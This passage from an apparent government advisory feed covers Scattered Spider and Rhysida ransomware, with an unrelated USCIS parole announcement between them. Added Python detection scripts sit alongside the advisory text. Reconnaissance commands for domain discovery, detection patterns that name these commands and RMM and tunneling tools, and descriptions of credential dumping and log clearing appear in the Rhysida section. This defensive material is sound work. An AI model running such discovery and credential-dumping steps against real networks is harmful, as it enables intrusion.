  Cloud Service Dashboard | T1538 | Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement.
  File and Directory Discovery | T1083 | Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation.
  Remote System Discovery | T1018 | Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit.

Table 13: Lateral Movement

  Technique Title | ID | Use
  Lateral Movement | TA0008 | Scattered Spider threat actors laterally move across a target network upon gaining access and establishing persistence.
  Remote Services: Cloud Services | T1021.007 | Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection.

Table 14: Collection

  Technique Title | ID | Use
  Data from Information Repositories: Code Repositories | T1213.003 | Scattered Spider threat actors search code repositories for data collection and exfiltration.
  Data from Information Repositories: Sharepoint | T1213.002 | Scattered Spider threat actors search SharePoint repositories for information.
  Data Staged | T1074 | Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration.
  Email Collection | T1114 | Scattered Spider threat actors search victims’ emails to determine if the victim has detected the intrusion and initiated any security response.
  Data from Cloud Storage | T1530 | Scattered Spider threat actors search data in cloud storage for collection and exfiltration.

Table 15: Command and Control

  Technique Title | ID | Use
  Remote Access Software | T1219 | Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools, thereby enabling access to and command and control of the victim’s network. Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network.

Table 16: Exfiltration

  Technique Title | ID | Use
  Exfiltration | TA0010 | Scattered Spider threat actors exfiltrate data from a target network for data extortion.
  Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Scattered Spider threat actors exfiltrate data to multiple sites, including U.S.-based data centers and MEGA[.]NZ.

Table 17: Impact

  Technique Title | ID | Use
  Data Encrypted for Impact | T1486 | Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption. Scattered Spider threat actors have been observed encrypting VMware ESXi servers.
  Financial Theft | T1657 | Scattered Spider threat actors monetized access to victim networks in numerous ways, including extortion enabled by ransomware and data theft.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques, thus strengthening the security posture of their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
    • Using security software to detect instances of remote access software being loaded only in memory.
    • Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
    • Applying recommendations in the Guide to Securing Remote Access Software.
  • Implement FIDO/WebAuthn authentication or Public Key Infrastructure (PKI)-based MFA. These MFA implementations are resistant to phishing and not susceptible to push bombing or SIM swap attacks, which are techniques known to be used by Scattered Spider actors. See CISA’s fact sheet Implementing Phishing-Resistant MFA for more information.
  • Strictly limit the use of Remote Desktop Protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
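One way to act on the remote access tool auditing bullets above is to review process-creation telemetry (Sysmon Event ID 1 or Windows Security event 4688, exported as CSV) against an authorized-tool inventory, flagging RMM and tunneling binaries from Table 1 that run outside their inventoried install directories and any executable launched from a user-writable path. This is an added example and not code from the advisory; the executable names, the CSV layout of the sample log, the authorized inventory, and the user-writable path list are assumptions.

```python
"""Review process-creation logs for remote access / RMM tools that are not in the
authorized inventory, and for copies running as portable executables from
user-writable paths. Added example, not from the advisory; log layout, binary
names and the inventory are assumptions to adapt to your environment."""
import csv
import io
import re

# Executable names the Table 1 tools are commonly seen under. Assumption: verify
# against your own telemetry, vendors rename binaries between releases.
RMM_BINARIES = {
    "screenconnect.clientservice.exe": "ScreenConnect",
    "screenconnect.windowsclient.exe": "ScreenConnect",
    "teamviewer.exe": "TeamViewer",
    "tv_w32.exe": "TeamViewer",
    "srserver.exe": "Splashtop",
    "srmanager.exe": "Splashtop",
    "pulseway.exe": "Pulseway",
    "tacticalrmm.exe": "Tactical RMM",
    "ngrok.exe": "ngrok",
    "tailscaled.exe": "Tailscale",
}

# Authorized inventory: tool -> install directories it may run from (lower-case prefixes).
AUTHORIZED = {
    "ScreenConnect": (r"c:\program files (x86)\screenconnect client",),
}

# Paths an ordinary user can write to; a "portable" RMM copy usually lands here.
USER_WRITABLE = re.compile(
    r"^c:\\(users\\[^\\]+\\(appdata|downloads|desktop)|windows\\temp|programdata)\\", re.I)
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "outlook.exe"}

# Constructed sample export: time,host,user,image,parent_image
SAMPLE_LOG = r"""time,host,user,image,parent_image
2023-11-10T13:58:01Z,WS01,jdoe,C:\Program Files (x86)\ScreenConnect Client (4b2f)\ScreenConnect.ClientService.exe,C:\Windows\System32\services.exe
2023-11-10T14:11:47Z,WS02,asmith,C:\Users\asmith\AppData\Local\Temp\ScreenConnect.WindowsClient.exe,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2023-11-10T14:13:05Z,WS02,asmith,C:\Users\asmith\Downloads\ngrok.exe,C:\Windows\System32\cmd.exe
2023-11-10T15:02:19Z,WS03,bjones,C:\Program Files\TeamViewer\TeamViewer.exe,C:\Windows\explorer.exe
2023-11-10T15:04:00Z,WS03,bjones,C:\Windows\System32\notepad.exe,C:\Windows\explorer.exe
2023-11-10T16:20:33Z,WS04,cdiaz,C:\Users\cdiaz\AppData\Local\Temp\setup_tool.exe,C:\Windows\explorer.exe
"""


def classify(image, parent_image):
    """Return (verdict, detail) for one process-creation record."""
    directory, _, name = image.lower().rpartition("\\")
    parent = parent_image.lower().rpartition("\\")[2]
    from_user_path = USER_WRITABLE.match(image) is not None
    tool = RMM_BINARIES.get(name)
    if tool:
        if any(directory.startswith(d) for d in AUTHORIZED.get(tool, ())):
            return "authorized_rmm", f"{tool} running from its inventoried install directory"
        reasons = [f"{tool} is not in the authorized inventory for this path"]
        if from_user_path:
            reasons.append("portable copy in a user-writable path")
        if parent in BROWSERS:
            reasons.append(f"launched by {parent}, consistent with a user being talked into running it")
        return "unauthorized_rmm", "; ".join(reasons)
    if from_user_path and name.endswith(".exe"):
        return "exe_from_user_path", f"{name} launched from a user-writable path; check against the allowlist"
    return "ok", name


def review(log_text):
    """Classify every row of a CSV export; returns the rows with verdict and detail added."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        verdict, detail = classify(row["image"], row["parent_image"])
        findings.append({**row, "verdict": verdict, "detail": detail})
    return findings


def summarize(findings):
    """Count records per verdict, handy for a daily report."""
    counts = {}
    for f in findings:
        counts[f["verdict"]] = counts.get(f["verdict"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in review(SAMPLE_LOG):
        if f["verdict"] != "ok":
            print(f["time"], f["host"], f["user"], f["verdict"], "-", f["detail"])
    print(summarize(review(SAMPLE_LOG)))
```

Name matching is the weakest link here (a renamed binary evades it), so pair this review with the allowlisting control from the first bullet and with signer or hash checks where your telemetry carries them; the value of the script is the inventory comparison, which catches a legitimately installed tool that nobody authorized as readily as a portable one.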

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
    • Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
    • Store passwords only in salted, hashed form in authentication systems, and use an industry-recognized password manager for credentials that must be stored for reuse.
    • Add per-user “salts” to stored password hashes so that shared or reused passwords do not produce identical hashes.
    • Avoid reusing passwords [CPG 2.C].
    • Lock accounts after multiple failed login attempts [CPG 2.G].
    • Disable password “hints.”
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Disable unused ports and protocols [CPG 2.V].
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 4-17).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REPORTING

FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.

VERSION HISTORY

November 16, 2023: Initial version.

USCIS Establishes Family Reunification Parole Process for Ecuador

Source: US Department of Homeland Security

Process will allow family members to reunite in the United States while they wait for immigrant visas to become available

WASHINGTON – U.S. Citizenship and Immigration Services (USCIS) today announced a Federal Register notice implementing a new family reunification parole (FRP) process for Ecuador, advancing the Biden-Harris Administration’s successful combination of expanded lawful pathways and strengthened enforcement to reduce irregular migration. The FRP processes promote family unity and are one of the comprehensive measures announced in April to promote safe and orderly migratory pathways, consistent with the objectives in the Los Angeles Declaration on Migration and Protection.

The new FRP process is by invitation only for certain nationals of Ecuador and allows an eligible beneficiary to be considered for parole into the United States on a case-by-case basis while they wait for their family-based immigrant visa to become available. This process is intended to reunite families more quickly and provide an alternative to dangerous irregular migration.

Certain nationals of Ecuador who are beneficiaries of an approved Form I-130, Petition for Alien Relative, may be eligible to be considered for parole under the new FRP processes. Qualifying beneficiaries must be outside the United States, must meet all requirements, including screening and vetting and medical requirements, and must not have already received an immigrant visa.

The process begins with the Department of State issuing an invitation to initiate the process to certain U.S. citizen or lawful permanent resident petitioners whose Form I-130 filed on behalf of an Ecuadorian principal beneficiary has been approved. Beneficiaries waiting for an immigrant visa could include certain children and siblings of U.S. citizens and certain spouses and children of permanent residents. The invited petitioner can then file a request to be a supporter of the beneficiary and eligible family members, who may then be considered for advance travel authorization and parole.

USCIS will begin using Form I-134A, Online Request to be a Supporter and Declaration of Financial Support, for this process on Nov. 17, 2023.

As with all parole requests, under this FRP process for certain nationals of Ecuador, parole will be authorized only on a case-by-case and temporary basis after determining that there are urgent humanitarian or significant public benefit reasons for authorizing parole and that the beneficiary warrants a favorable exercise of discretion. Noncitizens paroled into the United States under this process will generally be considered for parole for up to three years and can request employment authorization while they wait for their immigrant visa to become available. When their immigrant visa becomes available, they may apply to become a lawful permanent resident.

Section 212(d)(5)(A) of the Immigration and Nationality Act provides Secretary of Homeland Security Alejandro N. Mayorkas with the discretionary authority to parole applicants for admission into the United States temporarily on a case-by-case basis for urgent humanitarian or significant public benefit reasons. Previous secretaries have exercised the parole authority to establish other family reunification parole processes administered by USCIS, including the Cuban Family Reunification Parole Program in 2007 and the Haitian Family Reunification Parole Program in 2014. DHS announced new FRP processes for Colombia, El Salvador, Guatemala, and Honduras in July and the modernization of FRP processes for Cuba and Haiti in August.

The Federal Register notice explains the application process and eligibility criteria.

#StopRansomware: Rhysida Ransomware

Source: US Department of Homeland Security

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominantly been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.

FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.

Overview

Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.

For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.

Initial Access

Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably where organizations had not enabled MFA by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privilege vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]

Living off the Land

Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.

Ipconfig [T1016], whoami [T1033], nltest [T1482], and several net commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.

  • net user [username] /domain [T1087.002]
  • net group “domain computers” /domain [T1018]
  • net group “domain admins” /domain [T1069.002]
  • net localgroup administrators [T1069.001]
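
The following Python script, added here as an example and not part of the advisory, turns the discovery commands above into a detection. It normalizes process-creation command lines (full paths, quoted executables, curly versus straight quotes, net versus net1) and raises one alert when a single host/user pair runs three or more distinct discovery techniques within ten minutes, in any order. The event field names, the window, the threshold and the sample events are assumptions.

```python
"""Flag bursts of the discovery commands listed above in process-creation telemetry.

Added example for this advisory, not code from the CSA. It assumes process-creation
events (for instance Sysmon Event ID 1 or Security Event ID 4688) have already been
normalised into dicts with "time", "host", "user" and "cmdline" keys; the events at
the bottom are constructed for the demonstration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Discovery commands named in the advisory, with their ATT&CK technique IDs.
# "net1" is included because net.exe hands many subcommands to net1.exe.
DISCOVERY_PATTERNS = [
    (re.compile(r"^ipconfig(\s|$)"), "T1016"),
    (re.compile(r"^whoami(\s|$)"), "T1033"),
    (re.compile(r"^nltest(\s|$)"), "T1482"),
    (re.compile(r"^net1? user \S+ /domain(\s|$)"), "T1087.002"),
    (re.compile(r'^net1? group "domain computers" /domain(\s|$)'), "T1018"),
    (re.compile(r'^net1? group "domain admins" /domain(\s|$)'), "T1069.002"),
    (re.compile(r"^net1? localgroup administrators(\s|$)"), "T1069.001"),
]


def normalize(cmdline):
    """Lower-case, collapse whitespace, straighten curly quotes and reduce the
    executable to its bare name so a full path to net1.exe and a bare net both match."""
    s = cmdline.strip().replace("\u201c", '"').replace("\u201d", '"')
    s = re.sub(r"\s+", " ", s).lower()
    if s.startswith('"'):                      # quoted path, possibly containing spaces
        end = s.find('"', 1)
        exe, rest = s[1:end], s[end + 1:].strip()
    else:
        exe, _, rest = s.partition(" ")
    exe = exe.rsplit("\\", 1)[-1]
    if exe.endswith(".exe"):
        exe = exe[:-4]
    return f"{exe} {rest}".strip()


def classify(cmdline):
    """Return the ATT&CK technique ID for a discovery command, or None."""
    norm = normalize(cmdline)
    for pattern, technique in DISCOVERY_PATTERNS:
        if pattern.search(norm):
            return technique
    return None


def detect_bursts(events, window=timedelta(minutes=10), threshold=3):
    """Alert when one host/user pair runs at least `threshold` distinct discovery
    techniques within `window`. Order is ignored, matching the advisory's note that
    the commands were not run in a fixed sequence."""
    by_actor = defaultdict(list)
    for ev in events:
        technique = classify(ev["cmdline"])
        if technique:
            by_actor[(ev["host"], ev["user"])].append((ev["time"], technique, ev["cmdline"]))

    alerts = []
    for (host, user), hits in by_actor.items():
        hits.sort(key=lambda h: h[0])
        i = 0
        while i < len(hits):
            start = hits[i][0]
            j = i
            while j < len(hits) and hits[j][0] - start <= window:
                j += 1
            burst = hits[i:j]
            techniques = sorted({t for _, t, _ in burst})
            if len(techniques) >= threshold:
                alerts.append({"host": host, "user": user, "start": start,
                               "end": burst[-1][0], "techniques": techniques,
                               "commands": [c for _, _, c in burst]})
                i = j                          # one alert per burst
            else:
                i += 1
    return alerts


# Constructed sample telemetry: one user on WS01 running the advisory's discovery set
# within two minutes, and a help-desk user on WS02 running isolated, benign-looking commands.
SAMPLE_EVENTS = [
    {"time": datetime(2023, 9, 12, 2, 14, 5), "host": "WS01", "user": r"corp\jdoe", "cmdline": "whoami.exe"},
    {"time": datetime(2023, 9, 12, 2, 14, 31), "host": "WS01", "user": r"corp\jdoe",
     "cmdline": r"C:\Windows\System32\ipconfig.exe /all"},
    {"time": datetime(2023, 9, 12, 2, 15, 2), "host": "WS01", "user": r"corp\jdoe",
     "cmdline": "net group \u201cDomain Admins\u201d /domain"},
    {"time": datetime(2023, 9, 12, 2, 15, 40), "host": "WS01", "user": r"corp\jdoe",
     "cmdline": r'C:\Windows\System32\net1.exe group "domain computers" /domain'},
    {"time": datetime(2023, 9, 12, 2, 16, 11), "host": "WS01", "user": r"corp\jdoe", "cmdline": "nltest /domain_trusts"},
    {"time": datetime(2023, 9, 12, 9, 0, 0), "host": "WS02", "user": r"corp\helpdesk", "cmdline": "ipconfig /release"},
    {"time": datetime(2023, 9, 12, 10, 30, 0), "host": "WS02", "user": r"corp\helpdesk", "cmdline": "whoami"},
]

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']}: {', '.join(alert['techniques'])} "
              f"between {alert['start']:%H:%M:%S} and {alert['end']:%H:%M:%S}")
```

Any one of these commands is routine for an administrator, which is why the rule correlates distinct techniques per actor and time window rather than alerting on a single execution; tune the window and threshold against your own baseline before deploying.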

Analysis of the master file table (MFT)[4] identified that the victim system had generated an NTUSER.DAT registry hive for the compromised user, which is created when a user logs in to a system for the first time. This was considered anomalous given the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and records information about each file, including its size, time and date stamps, permissions, and (for small files) its data content.

Leveraged Tools

Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.

Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.

Table 1: Tools Leveraged by Rhysida Actors

Name

Description

cmd.exe

The native command line prompt utility.

PowerShell.exe

A native command line tool used to start a Windows PowerShell session in a Command Prompt window.

PsExec.exe

A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution.

mstsc.exe

A native tool that establishes an RDP connection to a host.

PuTTY.exe

Rhysida actors have been observed using PuTTY to create Secure Shell (SSH) connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTY to remotely connect to systems via SSH [T1021.004].

PortStarter

A backdoor written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1]

secretsdump

A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances.

ntdsutil.exe

A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the NTDS.dit database from the domain controller containing hashes for all Active Directory (AD) users.

Note: If there is any indication that the NTDS.dit file was compromised, it is strongly recommended that organizations perform a domain-wide password reset and reset the KRBTGT account password twice (allowing replication to complete between the two resets), since the KRBTGT hash in NTDS.dit can be used to forge Kerberos tickets (“golden tickets”).

AnyDesk

A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.

wevtutil.exe

A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001].

PowerView

A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials.

Rhysida Ransomware Characteristics

Execution

In one investigation, Rhysida actors created two folders in the C: drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.

Table 2: Malicious Executables Affiliated with Rhysida Infections

File Name

Hash (SHA256)

Description

conhost.exe

6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010

A ransomware binary.

psexec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

A file used to execute a process on a remote or local host.

S_0.bat

1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597

A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].

1.ps1

4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183

Identifies an extension block list of files to encrypt and not encrypt.

S_1.bat

97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4

A batch script that copies conhost.exe (the encryption binary) to the C:\Windows\Temp directory of each system on an imported list of host names.

S_2.bat

918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1

Executes conhost.exe on compromised victim systems, which encrypts files and appends the .rhysida extension across the environment.

Rhysida ransomware is a Windows 64-bit Portable Executable (PE) in the Common Object File Format (COFF), compiled with MinGW via the GNU Compiler Collection (GCC), a toolchain that supports languages such as C, C++, and Go. The ransomware first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].

Encryption

After mapping the network, the ransomware encrypts files with the ChaCha20 stream cipher and protects the symmetric key material with a 4096-bit RSA public key, so files cannot be recovered without the actors’ RSA private key [T1486]. ChaCha20 uses a 256-bit key, a 32-bit block counter, and a 96-bit nonce, and operates on an internal state of sixteen 32-bit words arranged as a four-by-four matrix. Registry modification commands [T1112] are not obfuscated; they appear as plain-text strings and are executed via cmd.exe.

Rhysida’s encryptor appends a .rhysida extension to every file it encrypts.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor accepts the arguments -d (select a directory) and -sr (remove itself after encryption), defined by the authors of the code in a function named parseOptions.[6] After the scripts and binaries complete their tasks, they delete themselves to evade detection.

Data Extortion

Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.

Figure 1: Rhysida Ransom Note

Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain text in the ransomware binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida actors appear to target systems with a graphical desktop rather than command-line-only systems; the PDF format of the ransom note suggests the actors expect victims’ systems to be able to open PDF documents.[8]
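
As an added example (not the advisory’s code), the script below implements the two file-based detections that this section and Table 2 make possible: exact SHA-256 matching against the Table 2 hashes, and a search for the ransom-note marker as both an ASCII and a UTF-16LE string, since Windows binaries frequently store strings as wide characters. The marker strings are assumptions, because the note text itself is not reproduced in this advisory; the file name the note is dropped under, CriticalBreachDetected, stands in for it. The sample files are constructed byte strings, not real samples.

```python
"""Triage files against the hashes in Table 2 and the plain-text ransom-note marker.

Added example for this advisory, not code from the CSA. The SHA-256 values are copied
from Table 2; the marker strings are an assumption (the advisory does not reproduce the
note text), and the sample files are constructed byte strings.
"""
import hashlib

# SHA-256 values from Table 2 of the advisory.
KNOWN_HASHES = {
    "6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010": "conhost.exe (Rhysida encryptor)",
    "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b": "psexec.exe",
    "1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597": "S_0.bat",
    "4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183": "1.ps1",
    "97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4": "S_1.bat",
    "918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1": "S_2.bat",
}

# Assumed markers (see lead-in). Each is searched as ASCII and as UTF-16LE.
MARKERS = ["CriticalBreachDetected", ".rhysida"]


def sha256_hex(data):
    """Hex SHA-256 of a byte string, for comparison with the advisory's tables."""
    return hashlib.sha256(data).hexdigest()


def find_markers(data, markers=MARKERS):
    """Return {marker: [(encoding, offset), ...]} for every marker present in data."""
    found = {}
    for marker in markers:
        for encoding in ("ascii", "utf-16-le"):
            offset = data.find(marker.encode(encoding))
            if offset != -1:
                found.setdefault(marker, []).append((encoding, offset))
    return found


def triage_file(name, data):
    """Combine exact-hash matching (high confidence, but brittle against rebuilds)
    with string matching (survives recompilation, but needs analyst confirmation)."""
    digest = sha256_hex(data)
    known_as = KNOWN_HASHES.get(digest)
    markers = find_markers(data)
    if known_as:
        verdict = "known-malicious"
    elif markers:
        verdict = "suspicious"
    else:
        verdict = "no-match"
    return {"name": name, "sha256": digest, "known_as": known_as,
            "markers": markers, "verdict": verdict}


# Constructed inputs: a fake PE header followed by the marker as a wide string at
# offset 64, and a benign text file.
SAMPLE_SUSPECT = b"MZ" + b"\x00" * 62 + "CriticalBreachDetected".encode("utf-16-le") + b"\x00" * 16
SAMPLE_BENIGN = b"Quarterly report draft. Nothing to see here.\n"

if __name__ == "__main__":
    for name, data in (("suspect.bin", SAMPLE_SUSPECT), ("report.txt", SAMPLE_BENIGN)):
        result = triage_file(name, data)
        print(f"{name}: {result['verdict']} sha256={result['sha256'][:16]}... markers={result['markers']}")
```

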